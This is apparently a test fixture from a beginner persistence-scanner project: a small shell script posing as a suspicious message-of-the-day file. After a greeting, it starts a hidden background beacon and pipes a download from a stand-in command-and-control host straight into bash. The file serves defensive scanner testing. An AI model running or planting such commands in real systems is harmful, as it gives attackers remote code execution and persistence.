Cybersecurity-Projects/PROJECTS/beginner/systemd-persistence-scanner/testdata/motd/suspicious-motd

5 lines
102 B
Bash
Executable File

#!/bin/sh
printf "Welcome\n"
nohup /tmp/.hidden/beacon &
curl -s http://c2.example.com/checkin | bash